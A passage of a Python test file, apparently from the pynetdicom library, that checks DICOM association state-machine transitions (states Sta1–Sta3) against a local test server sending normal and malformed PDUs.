self.assoc._mode = "acceptor"
self.assoc.start()
self.assoc.dul.socket.socket.connect(('localhost', 11112))
self.assoc.dul.socket._is_connected = True
time.sleep(0.1)
#self.print_fsm_scp(self.fsm, scp)
scp.shutdown()
assert self.fsm._transitions[:1] == []
assert self.fsm._changes[:1] == []
assert self.fsm._events[:1] == ['Evt17']
def test_evt18(self):
"""Test Sta1 + Evt18."""
# Sta1 + Evt18 -> <ignore> -> Sta1
# Evt18: ARTIM timer expired from <local service>
self.assoc._mode = "acceptor"
self.assoc.start()
self.assoc.dul.artim_timer.timeout = 0.05
self.assoc.dul.artim_timer.start()
time.sleep(0.1)
self.assoc.kill()
assert self.assoc.dul.artim_timer.expired
assert self.fsm._transitions == []
assert self.fsm._changes == []
assert self.fsm._events[0] == 'Evt18'
assert self.fsm.current_state == 'Sta1'
def test_evt19(self):
"""Test Sta1 + Evt19."""
# Sta1 + Evt19 -> <ignore> -> Sta1
# Evt19: Received unrecognised or invalid PDU from <remote>
commands = [
('send', b'\x08\x00\x00\x00\x00\x00\x00'),
]
scp = self.start_server(commands)
self.assoc._mode = "acceptor"
self.assoc.start()
self.assoc.dul.socket.socket.connect(('localhost', 11112))
self.assoc.dul.socket._is_connected = True
time.sleep(0.1)
#self.print_fsm_scp(self.fsm, scp)
scp.shutdown()
assert self.fsm._transitions[:1] == []
assert self.fsm._changes[:1] == []
assert self.fsm._events[:1] == ['Evt19']
class TestState02(TestStateBase):
"""Tests for State 02: Connection open, waiting for A-ASSOCIATE-RQ."""
def test_evt01(self):
"""Test Sta2 + Evt1."""
# Sta2 + Evt1 -> <ignore> -> Sta2
# Evt1: A-ASSOCIATE (rq) primitive from <local user>
commands = [
('wait', 0.3),
]
scp = self.start_server(commands)
assoc, fsm = self.get_acceptor_assoc()
assoc.start()
time.sleep(0.1)
assoc.dul.send_pdu(self.get_associate('request'))
time.sleep(0.1)
#self.print_fsm_scp(fsm, scp)
scp.shutdown()
assert fsm._transitions[:1] == ['Sta2']
assert fsm._changes[:1] == [
('Sta1', 'Evt5', 'AE-5'),
]
assert fsm._events[:2] == ['Evt5', 'Evt1']
@pytest.mark.skip()
def test_evt02(self):
"""Test Sta2 + Evt2."""
# Sta2 + Evt2 -> <ignore> -> Sta2
# Evt2: Receive TRANSPORT_OPEN from <transport service>
pass
def test_evt03(self):
"""Test Sta2 + Evt3."""
# Sta2 + Evt3 -> AA-1 -> Sta13
# Evt3: Receive A-ASSOCIATE-AC PDU from <remote>
# AA-1: Send A-ABORT PDU, start ARTIM
commands = [
('send', a_associate_ac),
('recv', None),
]
scp = self.start_server(commands)
assoc, fsm = self.get_acceptor_assoc()
assoc.start()
time.sleep(0.1)
#self.print_fsm_scp(fsm, scp)
scp.shutdown()
assert fsm._transitions[:2] == ['Sta2', 'Sta13']
assert fsm._changes[:2] == [
('Sta1', 'Evt5', 'AE-5'),
('Sta2', 'Evt3', 'AA-1')
]
assert fsm._events[:2] == ['Evt5', 'Evt3']
def test_evt04(self):
"""Test Sta2 + Evt4."""
# Sta2 + Evt4 -> AA-1 -> Sta13
# Evt4: Receive A-ASSOCIATE-RJ PDU from <remote>
# AA-1: Send A-ABORT PDU, start ARTIM
commands = [
('send', a_associate_rj),
('recv', None),
]
scp = self.start_server(commands)
assoc, fsm = self.get_acceptor_assoc()
assoc.start()
time.sleep(0.1)
#self.print_fsm_scp(fsm, scp)
scp.shutdown()
assert fsm._transitions[:2] == ['Sta2', 'Sta13']
assert fsm._changes[:2] == [
('Sta1', 'Evt5', 'AE-5'),
('Sta2', 'Evt4', 'AA-1')
]
assert fsm._events[:2] == ['Evt5', 'Evt4']
@pytest.mark.skip()
def test_evt05(self):
"""Test Sta2 + Evt5."""
# Sta2 + Evt5 -> <ignore> -> Sta2
# Evt5: Receive TRANSPORT_INDICATION from <transport service>
pass
def test_evt06a(self):
"""Test Sta2 + Evt6."""
# Sta2 + Evt6 -> AE-6 -> **Sta3** or Sta13
# Evt6: Receive A-ASSOCIATE-RQ PDU from <remote>
# AE-6: Stop ARTIM, issue A-ASSOCIATE or A-ASSOCIATE-RJ PDU
commands = [
('send', a_associate_rq),
('recv', None),
]
scp = self.start_server(commands)
assoc, fsm = self.get_acceptor_assoc()
assoc.start()
time.sleep(0.1)
#self.print_fsm_scp(fsm, scp)
scp.shutdown()
assert fsm._transitions[:2] == ['Sta2', 'Sta3']
assert fsm._changes[:2] == [
('Sta1', 'Evt5', 'AE-5'),
('Sta2', 'Evt6', 'AE-6')
]
assert fsm._events[:2] == ['Evt5', 'Evt6']
def test_evt06b(self):
"""Test Sta2 + Evt6."""
# Sta2 + Evt6 -> AE-6 -> Sta3 or **Sta13**
# Evt6: Receive A-ASSOCIATE-RQ PDU from <remote>
# AE-6: Stop ARTIM, issue A-ASSOCIATE or A-ASSOCIATE-RJ PDU
bad_request = a_associate_rq[:6] + b'\x00\x02' + a_associate_rq[8:]
assert len(bad_request) == len(a_associate_rq)
commands = [
('send', bad_request),
('recv', None),
]
scp = self.start_server(commands)
assoc, fsm = self.get_acceptor_assoc()
assoc.start()
time.sleep(0.1)
#self.print_fsm_scp(fsm, scp)
scp.shutdown()
assert fsm._transitions[:2] == ['Sta2', 'Sta13']
assert fsm._changes[:2] == [
('Sta1', 'Evt5', 'AE-5'),
('Sta2', 'Evt6', 'AE-6')
]
assert fsm._events[:2] == ['Evt5', 'Evt6']
def test_evt07(self):
"""Test Sta2 + Evt7."""
# Sta2 + Evt7 -> <ignore> -> Sta2
# Evt7: Receive A-ASSOCIATE (accept) primitive from <local user>
commands = [
('wait', 0.3),
]
scp = self.start_server(commands)
assoc, fsm = self.get_acceptor_assoc()
assoc.start()
time.sleep(0.1)
assoc.dul.send_pdu(self.get_associate('accept'))
time.sleep(0.1)
#self.print_fsm_scp(fsm, scp)
scp.shutdown()
assert fsm._transitions[:1] == ['Sta2']
assert fsm._changes[:1] == [
('Sta1', 'Evt5', 'AE-5'),
]
assert fsm._events[:2] == ['Evt5', 'Evt7']
def test_evt08(self):
"""Test Sta2 + Evt8."""
# Sta2 + Evt8 -> <ignore> -> Sta2
# Evt8: Receive A-ASSOCIATE (reject) primitive from <local user>
commands = [
('wait', 0.3),
]
scp = self.start_server(commands)
assoc, fsm = self.get_acceptor_assoc()
assoc.start()
time.sleep(0.1)
assoc.dul.send_pdu(self.get_associate('reject'))
time.sleep(0.1)
#self.print_fsm_scp(fsm, scp)
scp.shutdown()
assert fsm._transitions[:1] == ['Sta2']
assert fsm._changes[:1] == [
('Sta1', 'Evt5', 'AE-5'),
]
assert fsm._events[:2] == ['Evt5', 'Evt8']
def test_evt09(self):
"""Test Sta2 + Evt9."""
# Sta2 + Evt9 -> <ignore> -> Sta2
# Evt9: Receive P-DATA primitive from <local user>
commands = [
('wait', 0.3),
]
scp = self.start_server(commands)
assoc, fsm = self.get_acceptor_assoc()
assoc.start()
time.sleep(0.1)
assoc.dul.send_pdu(self.get_pdata())
time.sleep(0.1)
#self.print_fsm_scp(fsm, scp)
scp.shutdown()
assert fsm._transitions[:1] == ['Sta2']
assert fsm._changes[:1] == [
('Sta1', 'Evt5', 'AE-5'),
]
assert fsm._events[:2] == ['Evt5', 'Evt9']
def test_evt10(self):
"""Test Sta2 + Evt10."""
# Sta2 + Evt10 -> AA-1 -> Sta13
# Evt10: Receive P-DATA-TF PDU from <remote>
# AA-1: Send A-ABORT PDU, start ARTIM
commands = [
('send', p_data_tf),
('recv', None),
]
scp = self.start_server(commands)
assoc, fsm = self.get_acceptor_assoc()
assoc.start()
time.sleep(0.1)
#self.print_fsm_scp(fsm, scp)
scp.shutdown()
assert fsm._transitions[:2] == ['Sta2', 'Sta13']
assert fsm._changes[:2] == [
('Sta1', 'Evt5', 'AE-5'),
('Sta2', 'Evt10', 'AA-1')
]
assert fsm._events[:2] == ['Evt5', 'Evt10']
def test_evt11(self):
"""Test Sta2 + Evt11."""
# Sta2 + Evt11 -> <ignore> -> Sta2
# Evt11: Receive A-RELEASE (rq) primitive from <local user>
commands = [
('wait', 0.3),
]
scp = self.start_server(commands)
assoc, fsm = self.get_acceptor_assoc()
assoc.start()
time.sleep(0.1)
assoc.dul.send_pdu(self.get_release(False))
time.sleep(0.1)
#self.print_fsm_scp(fsm, scp)
scp.shutdown()
assert fsm._transitions[:1] == ['Sta2']
assert fsm._changes[:1] == [
('Sta1', 'Evt5', 'AE-5'),
]
assert fsm._events[:2] == ['Evt5', 'Evt11']
def test_evt12(self):
"""Test Sta2 + Evt12."""
# Sta2 + Evt12 -> AA-1 -> Sta13
# Evt12: Receive A-RELEASE-RQ PDU from <remote>
# AA-1: Send A-ABORT PDU, start ARTIM
commands = [
('send', a_release_rq),
('recv', None),
]
scp = self.start_server(commands)
assoc, fsm = self.get_acceptor_assoc()
assoc.start()
time.sleep(0.1)
#self.print_fsm_scp(fsm, scp)
scp.shutdown()
assert fsm._transitions[:2] == ['Sta2', 'Sta13']
assert fsm._changes[:2] == [
('Sta1', 'Evt5', 'AE-5'),
('Sta2', 'Evt12', 'AA-1')
]
assert fsm._events[:2] == ['Evt5', 'Evt12']
def test_evt13(self):
"""Test Sta2 + Evt13."""
# Sta2 + Evt13 -> AA-1 -> Sta13
# Evt13: Receive A-RELEASE-RP PDU from <remote>
# AA-1: Send A-ABORT PDU, start ARTIM
commands = [
('send', a_release_rp),
('recv', None),
]
scp = self.start_server(commands)
assoc, fsm = self.get_acceptor_assoc()
assoc.start()
time.sleep(0.1)
#self.print_fsm_scp(fsm, scp)
scp.shutdown()
assert fsm._transitions[:2] == ['Sta2', 'Sta13']
assert fsm._changes[:2] == [
('Sta1', 'Evt5', 'AE-5'),
('Sta2', 'Evt13', 'AA-1')
]
assert fsm._events[:2] == ['Evt5', 'Evt13']
def test_evt14(self):
"""Test Sta2 + Evt14."""
# Sta2 + Evt14 -> <ignore> -> Sta2
# Evt14: Receive A-RELEASE (rsp) primitive from <local user>
commands = [
('wait', 0.3),
]
scp = self.start_server(commands)
assoc, fsm = self.get_acceptor_assoc()
assoc.start()
time.sleep(0.1)
assoc.dul.send_pdu(self.get_release(True))
time.sleep(0.1)
#self.print_fsm_scp(fsm, scp)
scp.shutdown()
assert fsm._transitions[:1] == ['Sta2']
assert fsm._changes[:1] == [
('Sta1', 'Evt5', 'AE-5'),
]
assert fsm._events[:2] == ['Evt5', 'Evt14']
def test_evt15(self):
"""Test Sta2 + Evt15."""
# Sta2 + Evt15 -> <ignore> -> Sta2
# Evt15: Receive A-ABORT (rq) primitive from <local user>
commands = [
('wait', 0.3),
]
scp = self.start_server(commands)
assoc, fsm = self.get_acceptor_assoc()
assoc.start()
time.sleep(0.1)
assoc.dul.send_pdu(self.get_abort())
time.sleep(0.1)
#self.print_fsm_scp(fsm, scp)
scp.shutdown()
assert fsm._transitions[:1] == ['Sta2']
assert fsm._changes[:1] == [
('Sta1', 'Evt5', 'AE-5'),
]
assert fsm._events[:2] == ['Evt5', 'Evt15']
def test_evt16(self):
"""Test Sta2 + Evt16."""
# Sta2 + Evt16 -> AA-2 -> Sta1
# Evt16: Receive A-ABORT PDU from <remote>
# AA-2: Stop ARTIM, close connection
commands = [
('send', a_abort),
]
scp = self.start_server(commands)
assoc, fsm = self.get_acceptor_assoc()
assoc.start()
time.sleep(0.1)
#self.print_fsm_scp(fsm, scp)
scp.shutdown()
assert fsm._transitions[:2] == ['Sta2', 'Sta1']
assert fsm._changes[:2] == [
('Sta1', 'Evt5', 'AE-5'),
('Sta2', 'Evt16', 'AA-2')
]
assert fsm._events[:2] == ['Evt5', 'Evt16']
def test_evt17(self):
"""Test Sta2 + Evt17."""
# Sta2 + Evt17 -> AA-5 -> Sta1
# Evt17: Receive TRANSPORT_CLOSED from <transport service>
# AA-5: Stop ARTIM timer
commands = []
scp = self.start_server(commands)
assoc, fsm = self.get_acceptor_assoc()
assoc.start()
time.sleep(0.1)
#self.print_fsm_scp(fsm, scp)
scp.shutdown()
assert fsm._transitions[:2] == ['Sta2', 'Sta1']
assert fsm._changes[:2] == [
('Sta1', 'Evt5', 'AE-5'),
('Sta2', 'Evt17', 'AA-5')
]
assert fsm._events[:2] == ['Evt5', 'Evt17']
def test_evt18(self):
"""Test Sta2 + Evt18."""
# Sta2 + Evt18 -> AA-2 -> Sta1
# Evt18: ARTIM timer expired from <local service>
commands = [
('wait', 0.3),
]
scp = self.start_server(commands)
assoc, fsm = self.get_acceptor_assoc()
assoc.start()
time.sleep(0.1)
assoc.dul.artim_timer.timeout = 0.05
assoc.dul.artim_timer.start()
time.sleep(0.1)
#self.print_fsm_scp(fsm, scp)
scp.shutdown()
assert fsm._transitions[:1] == ['Sta2']
assert fsm._changes[:1] == [
('Sta1', 'Evt5', 'AE-5'),
]
assert fsm._events[:2] == ['Evt5', 'Evt18']
def test_evt19(self):
"""Test Sta2 + Evt19."""
# Sta2 + Evt19 -> AA-1 -> Sta13
# Evt19: Received unrecognised or invalid PDU from <remote>
# AA-1: Send A-ABORT PDU, start ARTIM
commands = [
('send', b'\x08\x00\x00\x00\x00\x00\x00\x00'),
]
scp = self.start_server(commands)
assoc, fsm = self.get_acceptor_assoc()
assoc.start()
time.sleep(0.1)
#self.print_fsm_scp(fsm, scp)
scp.shutdown()
assert fsm._transitions[:2] == ['Sta2', 'Sta13']
assert fsm._changes[:2] == [
('Sta1', 'Evt5', 'AE-5'),
('Sta2', 'Evt19', 'AA-1')
]
assert fsm._events[:2] == ['Evt5', 'Evt19']
class TestState03(TestStateBase):
"""Tests for State 03: Awaiting A-ASSOCIATE (rsp) primitive."""
def test_evt01(self):
"""Test Sta3 + Evt1."""
# Sta3 + Evt1 -> <ignore> -> Sta3
# Evt1: A-ASSOCIATE (rq) primitive from <local user>
commands = [
('wait', 0.1),
('send', a_associate_rq),
('wait', 0.2)
]
scp = self.start_server(commands)
assoc, fsm = self.get_acceptor_assoc()
def _neg_as_acc():
"""Override ACSE._negotiate_as_acceptor so no A-ASSOCIATE (rsp)."""
pass
assoc.acse._negotiate_as_acceptor = _neg_as_acc
assoc.start()
time.sleep(0.15)
assoc.dul.send_pdu(self.get_associate('request'))
time.sleep(0.1)
#self.print_fsm_scp(fsm, scp)
scp.shutdown()
assert fsm._transitions[:2] == ['Sta2', 'Sta3']
assert fsm._changes[:2] == [
('Sta1', 'Evt5', 'AE-5'),
('Sta2', 'Evt6', 'AE-6')
]
assert fsm._events[:3] == ['Evt5', 'Evt6', 'Evt1']
@pytest.mark.skip()
def test_evt02(self):
"""Test Sta3 + Evt2."""
# Sta3 + Evt2 -> <ignore> -> Sta3
# Evt2: Receive TRANSPORT_OPEN from <transport service>
pass
def test_evt03(self):
"""Test Sta3 + Evt3."""
# Sta3 + Evt3 -> AA-8 -> Sta13
# Evt3: Receive A-ASSOCIATE-AC PDU from <remote>
# AA-8: Send A-ABORT PDU, issue A-P-ABORT primitive, start ARTIM
commands = [
('wait', 0.1),
('send', a_associate_rq),
('send', a_associate_ac),
('wait', 0.2)
]
scp = self.start_server(commands)
assoc, fsm = self.get_acceptor_assoc()
orig = assoc.acse._negotiate_as_acceptor
def _neg_as_acc():
"""Override ACSE._negotiate_as_acceptor so no A-ASSOCIATE (rsp)."""
# Keep the state machine in Sta3 for 0.5 s
time.sleep(0.5)
orig()
assoc.acse._negotiate_as_acceptor = _neg_as_acc
assoc.start()
time.sleep(0.15)
#self.print_fsm_scp(fsm, scp)
scp.shutdown()
assert fsm._transitions[:2] == ['Sta2', 'Sta3']
assert fsm._changes[:3] == [
('Sta1', 'Evt5', 'AE-5'),
('Sta2', 'Evt6', 'AE-6'),
('Sta3', 'Evt3', 'AA-8')
]
assert fsm._events[:3] == ['Evt5', 'Evt6', 'Evt3']
def test_evt04(self):
"""Test Sta3 + Evt4."""
# Sta3 + Evt4 -> AA-8 -> Sta13
# Evt4: Receive A-ASSOCIATE-RJ PDU from <remote>
# AA-8: Send A-ABORT PDU, issue A-P-ABORT primitive, start ARTIM
commands = [
('wait', 0.1),
('send', a_associate_rq),
('send', a_associate_rj),
('wait', 0.2)
]
scp = self.start_server(commands)
assoc, fsm = self.get_acceptor_assoc()
orig = assoc.acse._negotiate_as_acceptor
def _neg_as_acc():
"""Override ACSE._negotiate_as_acceptor so no A-ASSOCIATE (rsp)."""
# Keep the state machine in Sta3 for 0.5 s
time.sleep(0.5)
orig()
assoc.acse._negotiate_as_acceptor = _neg_as_acc
assoc.start()
time.sleep(0.15)
#self.print_fsm_scp(fsm, scp)
scp.shutdown()
assert fsm._transitions[:2] == ['Sta2', 'Sta3']
assert fsm._changes[:3] == [
('Sta1', 'Evt5', 'AE-5'),
('Sta2', 'Evt6', 'AE-6'),
('Sta3', 'Evt4', 'AA-8')
]
assert fsm._events[:3] == ['Evt5', 'Evt6', 'Evt4']
@pytest.mark.skip()
def test_evt05(self):
"""Test Sta3 + Evt5."""
# Sta3 + Evt5 -> <ignore> -> Sta3
# Evt5: Receive TRANSPORT_INDICATION from <transport service>
pass
def test_evt06(self):
"""Test Sta3 + Evt6."""
# Sta3 + Evt6 -> AA-8 -> Sta13
# Evt6: Receive A-ASSOCIATE-RQ PDU from <remote>
# AA-8: Send A-ABORT PDU, issue A-P-ABORT primitive, start ARTIM
commands = [
('wait', 0.1),
('send', a_associate_rq),
('send', a_associate_rq),
('wait', 0.2)
]
scp = self.start_server(commands)
assoc, fsm = self.get_acceptor_assoc()
orig = assoc.acse._negotiate_as_acceptor
def _neg_as_acc():
"""Override ACSE._negotiate_as_acceptor so no A-ASSOCIATE (rsp)."""
# Keep the state machine in Sta3 for 0.5 s
time.sleep(0.5)
orig()
assoc.acse._negotiate_as_acceptor = _neg_as_acc
assoc.start()
time.sleep(0.15)
#self.print_fsm_scp(fsm, scp)
scp.shutdown()
assert fsm._transitions[:2] == ['Sta2', 'Sta3']
assert fsm._changes[:3] == [
('Sta1', 'Evt5', 'AE-5'),
('Sta2', 'Evt6', 'AE-6'),
('Sta3', 'Evt6', 'AA-8')
]
assert fsm._events[:3] == ['Evt5', 'Evt6', 'Evt6']
def test_evt07(self):
"""Test Sta3 + Evt7."""
# Sta3 + Evt7 -> AE-7 -> Sta6
# Evt7: Receive A-ASSOCIATE (accept) primitive from <local user>
# AE-7: Send A-ASSOCIATE-AC PDU
commands = [
('wait', 0.1),
('send', a_associate_rq),
('wait', 0.2)
]
scp = self.start_server(commands)
assoc, fsm = self.get_acceptor_assoc()
assoc.start()
time.sleep(0.15)
#self.print_fsm_scp(fsm, scp)
scp.shutdown()
assert fsm._transitions[:3] == ['Sta2', 'Sta3', 'Sta6']
assert fsm._changes[:3] == [
('Sta1', 'Evt5', 'AE-5'),
('Sta2', 'Evt6', 'AE-6'),
('Sta3', 'Evt7', 'AE-7')
]
assert fsm._events[:3] == ['Evt5', 'Evt6', 'Evt7']
def test_evt08(self):
"""Test Sta3 + Evt8."""
# Sta3 + Evt8 -> AE-8 -> Sta13
# Evt8: Receive A-ASSOCIATE (reject) primitive from <local user>
# AE-8: Send A-ASSOCIATE-RJ PDU and start ARTIM
commands = [
('wait', 0.1),
('send', a_associate_rq),
('wait', 0.2)
]
scp = self.start_server(commands)
assoc, fsm = self.get_acceptor_assoc()
orig = assoc.acse._negotiate_as_acceptor
def _neg_as_acc():
"""Override ACSE._negotiate_as_acceptor so no A-ASSOCIATE (rsp)."""
assoc.dul.send_pdu(self.get_associate('reject'))
assoc.acse._negotiate_as_acceptor = _neg_as_acc
assoc.start()
time.sleep(0.15)
#self.print_fsm_scp(fsm, scp)
scp.shutdown()
assert fsm._transitions[:2] == ['Sta2', 'Sta3']
assert fsm._changes[:3] == [
('Sta1', 'Evt5', 'AE-5'),
('Sta2', 'Evt6', 'AE-6'),
('Sta3', 'Evt8', 'AE-8')
]
assert fsm._events[:3] == ['Evt5', 'Evt6', 'Evt8']
def test_evt09(self):
"""Test Sta3 + Evt9."""
# Sta3 + Evt9 -> <ignore> -> Sta3
# Evt9: Receive P-DATA primitive from <local user>
commands = [
('wait', 0.1),
('send', a_associate_rq),
('wait', 0.2)
]
scp = self.start_server(commands)
assoc, fsm = self.get_acceptor_assoc()
orig = assoc.acse._negotiate_as_acceptor
def _neg_as_acc():
"""Override ACSE._negotiate_as_acceptor so no A-ASSOCIATE (rsp)."""
assoc.dul.send_pdu(self.get_pdata())
assoc.acse._negotiate_as_acceptor = _neg_as_acc
assoc.start()
time.sleep(0.15)
#self.print_fsm_scp(fsm, scp)
scp.shutdown()
assert fsm._transitions[:2] == ['Sta2', 'Sta3']
assert fsm._changes[:2] == [
('Sta1', 'Evt5', 'AE-5'),
('Sta2', 'Evt6', 'AE-6'),
]
assert fsm._events[:3] == ['Evt5', 'Evt6', 'Evt9']
def test_evt10(self):
"""Test Sta3 + Evt10."""
# Sta3 + Evt10 -> AA-8 -> Sta13
# Evt10: Receive P-DATA-TF PDU from <remote>
# AA-8: Send A-ABORT PDU, issue A-P-ABORT primitive, start ARTIM
commands = [
('wait', 0.1),
('send', a_associate_rq),
('send', p_data_tf),
('wait', 0.2)
]
scp = self.start_server(commands)
assoc, fsm = self.get_acceptor_assoc()
orig = assoc.acse._negotiate_as_acceptor
def _neg_as_acc():
"""Override ACSE._negotiate_as_acceptor so no A-ASSOCIATE (rsp)."""
# Keep the state machine in Sta3 for 0.5 s
time.sleep(0.5)
orig()
assoc.acse._negotiate_as_acceptor = _neg_as_acc
assoc.start()
time.sleep(0.15)
#self.print_fsm_scp(fsm, scp)
scp.shutdown()
assert fsm._transitions[:2] == ['Sta2', 'Sta3']
assert fsm._changes[:3] == [
('Sta1', 'Evt5', 'AE-5'),
('Sta2', 'Evt6', 'AE-6'),
('Sta3', 'Evt10', 'AA-8')
]
assert fsm._events[:3] == ['Evt5', 'Evt6', 'Evt10']
def test_evt11(self):
"""Test Sta3 + Evt11."""
# Sta3 + Evt11 -> <ignore> -> Sta3
# Evt11: Receive A-RELEASE (rq) primitive from <local user>
commands = [
('wait', 0.1),
('send', a_associate_rq),
('wait', 0.2)
]
scp = self.start_server(commands)
assoc, fsm = self.get_acceptor_assoc()
orig = assoc.acse._negotiate_as_acceptor
def _neg_as_acc():
"""Override ACSE._negotiate_as_acceptor so no A-ASSOCIATE (rsp)."""
assoc.dul.send_pdu(self.get_release(False))
assoc.acse._negotiate_as_acceptor = _neg_as_acc
assoc.start()
time.sleep(0.15)
#self.print_fsm_scp(fsm, scp)
scp.shutdown()
assert fsm._transitions[:2] == ['Sta2', 'Sta3']
assert fsm._changes[:2] == [
('Sta1', 'Evt5', 'AE-5'),
('Sta2', 'Evt6', 'AE-6'),
]
assert fsm._events[:3] == ['Evt5', 'Evt6', 'Evt11']
def test_evt12(self):
"""Test Sta3 + Evt12."""
# Sta3 + Evt12 -> AA-8 -> Sta13
# Evt12: Receive A-RELEASE-RQ PDU from <remote>
# AA-8: Send A-ABORT PDU, issue A-P-ABORT primitive, start ARTIM
commands = [
('wait', 0.1),
('send', a_associate_rq),
('send', a_release_rq),
('wait', 0.2)
]
scp = self.start_server(commands)
assoc, fsm = self.get_acceptor_assoc()
orig = assoc.acse._negotiate_as_acceptor
def _neg_as_acc():
"""Override ACSE._negotiate_as_acceptor so no A-ASSOCIATE (rsp)."""
# Keep the state machine in Sta3 for 0.5 s
time.sleep(0.5)
orig()
assoc.acse._negotiate_as_acceptor = _neg_as_acc
assoc.start()
time.sleep(0.15)
#self.print_fsm_scp(fsm, scp)
scp.shutdown()
assert fsm._transitions[:2] == ['Sta2', 'Sta3']
assert fsm._changes[:3] == [
('Sta1', 'Evt5', 'AE-5'),
('Sta2', 'Evt6', 'AE-6'),
('Sta3', 'Evt12', 'AA-8')
]
assert fsm._events[:3] == ['Evt5', 'Evt6', 'Evt12']
def test_evt13(self):
"""Test Sta3 + Evt13."""
# Sta3 + Evt13 -> AA-8 -> Sta13
# Evt13: Receive A-RELEASE-RP PDU from <remote>
# AA-8: Send A-ABORT PDU, issue A-P-ABORT primitive, start ARTIM
commands = [
('wait', 0.1),
('send', a_associate_rq),
('send', a_release_rp),
('wait', 0.2)
]
scp = self.start_server(commands)
assoc, fsm = self.get_acceptor_assoc()
orig = assoc.acse._negotiate_as_acceptor
def _neg_as_acc():
"""Override ACSE._negotiate_as_acceptor so no A-ASSOCIATE (rsp)."""
# Keep the state machine in Sta3 for 0.5 s
time.sleep(0.5)
orig()
assoc.acse._negotiate_as_acceptor = _neg_as_acc
assoc.start()
time.sleep(0.15)
#self.print_fsm_scp(fsm, scp)
scp.shutdown()
assert fsm._transitions[:2] == ['Sta2', 'Sta3']
assert fsm._changes[:3] == [
('Sta1', 'Evt5', 'AE-5'),
('Sta2', 'Evt6', 'AE-6'),
('Sta3', 'Evt13', 'AA-8')
]
assert fsm._events[:3] == ['Evt5', 'Evt6', 'Evt13']
def test_evt14(self):
"""Test Sta3 + Evt14."""
# Sta3 + Evt14 -> <ignore> -> Sta3
# Evt14: Receive A-RELEASE (rsp) primitive from <local user>
commands = [
('wait', 0.1),
('send', a_associate_rq),
('wait', 0.2)
]
scp = self.start_server(commands)
assoc, fsm = self.get_acceptor_assoc()
orig = assoc.acse._negotiate_as_acceptor
def _neg_as_acc():
"""Override ACSE._negotiate_as_acceptor so no A-ASSOCIATE (rsp)."""
assoc.dul.send_pdu(self.get_release(True))
assoc.acse._negotiate_as_acceptor = _neg_as_acc
assoc.start()
time.sleep(0.15)
#self.print_fsm_scp(fsm, scp)
scp.shutdown()
assert fsm._transitions[:2] == ['Sta2', 'Sta3']
assert fsm._changes[:2] == [
('Sta1', 'Evt5', 'AE-5'),
('Sta2', 'Evt6', 'AE-6'),
]
assert fsm._events[:3] == ['Evt5', 'Evt6', 'Evt14']
def test_evt15(self):
"""Test Sta3 + Evt15."""
# Sta3 + Evt15 -> AA-1 -> Sta13
# Evt15: Receive A-ABORT (rq) primitive from <local user>
# AA-1: Send A-ABORT PDU, start ARTIM
commands = [
('wait', 0.1),
('send', a_associate_rq),
('wait', 0.2)
]
scp = self.start_server(commands)
assoc, fsm = self.get_acceptor_assoc()
orig = assoc.acse._negotiate_as_acceptor
def _neg_as_acc():
"""Override ACSE._negotiate_as_acceptor so no A-ASSOCIATE (rsp)."""
assoc.dul.send_pdu(self.get_abort())
assoc.acse._negotiate_as_acceptor = _neg_as_acc
assoc.start()
time.sleep(0.15)
#self.print_fsm_scp(fsm, scp)
scp.shutdown()
assert fsm._transitions[:2] == ['Sta2', 'Sta3']
assert fsm._changes[:3] == [
('Sta1', 'Evt5', 'AE-5'),
('Sta2', 'Evt6', 'AE-6'),
('Sta3', 'Evt15', 'AA-1'),
]
assert fsm._events[:3] == ['Evt5', 'Evt6', 'Evt15']
def test_evt16(self):
"""Test Sta3 + Evt16."""
# Sta3 + Evt16 -> AA-3 -> Sta1
# Evt16: Receive A-ABORT PDU from <remote>
# AA-3: Issue A-ABORT or A-P-ABORT primitive, close connection
commands = [
('wait', 0.1),
('send', a_associate_rq),
('send', a_abort),
('wait', 0.2)
]
scp = self.start_server(commands)
assoc, fsm = self.get_acceptor_assoc()
orig = assoc.acse._negotiate_as_acceptor
def _neg_as_acc():
"""Override ACSE._negotiate_as_acceptor so no A-ASSOCIATE (rsp)."""
# Keep the state machine in Sta3 for 0.5 s
time.sleep(0.5)
orig()
assoc.acse._negotiate_as_acceptor = _neg_as_acc
assoc.start()
time.sleep(0.15)
#self.print_fsm_scp(fsm, scp)
scp.shutdown()
assert fsm._transitions[:2] == ['Sta2', 'Sta3']
assert fsm._changes[:3] == [
('Sta1', 'Evt5', 'AE-5'),
('Sta2', 'Evt6', 'AE-6'),
('Sta3', 'Evt16', 'AA-3')
]
assert fsm._events[:3] == ['Evt5', 'Evt6', 'Evt16']
def test_evt17(self):
"""Test Sta3 + Evt17."""
# Sta3 + Evt17 -> AA-4 -> Sta1
# Evt17: Receive TRANSPORT_CLOSED from <transport service>
# AA-4: Issue A-P-ABORT primitive
commands = [
('wait', 0.1),
('send', a_associate_rq),
]
scp = self.start_server(commands)
assoc, fsm = self.get_acceptor_assoc()
orig = assoc.acse._negotiate_as_acceptor
def _neg_as_acc():
"""Override ACSE._negotiate_as_acceptor so no A-ASSOCIATE (rsp)."""
# Keep the state machine in Sta3 for 0.5 s
time.sleep(0.5)
orig()
assoc.acse._negotiate_as_acceptor = _neg_as_acc
assoc.start()
time.sleep(0.15)
#self.print_fsm_scp(fsm, scp)
scp.shutdown()
assert fsm._transitions[:2] == ['Sta2', 'Sta3']
assert fsm._changes[:3] == [
('Sta1', 'Evt5', 'AE-5'),
('Sta2', 'Evt6', 'AE-6'),
('Sta3', 'Evt17', 'AA-4')
]
assert fsm._events[:3] == ['Evt5', 'Evt6', 'Evt17']
def test_evt18(self):
"""Test Sta3 + Evt18."""
# Sta3 + Evt18 -> <ignore> -> Sta3
# Evt18: ARTIM timer expired from <local service>
commands = [
('wait', 0.1),
('send', a_associate_rq),
('wait', 0.5)
]
scp = self.start_server(commands)
assoc, fsm = self.get_acceptor_assoc()
orig = assoc.acse._negotiate_as_acceptor
def _neg_as_acc():
"""Override ACSE._negotiate_as_acceptor so no A-ASSOCIATE (rsp)."""
            # Make the ARTIM timer expire (Evt18) while the FSM is still in Sta3
assoc.dul.artim_timer.timeout = 0.05
assoc.dul.artim_timer.start()
time.sleep(0.2)
orig()
assoc.acse._negotiate_as_acceptor = _neg_as_acc
assoc.start()
time.sleep(0.15)
#self.print_fsm_scp(fsm, scp)
scp.shutdown()
assert fsm._transitions[:2] == ['Sta2', 'Sta3']
assert fsm._changes[:2] == [
('Sta1', 'Evt5', 'AE-5'),
('Sta2', 'Evt6', 'AE-6'),
]
assert fsm._events[:3] == ['Evt5', 'Evt6', 'Evt18']
def test_evt19(self):
"""Test Sta3 + Evt19."""
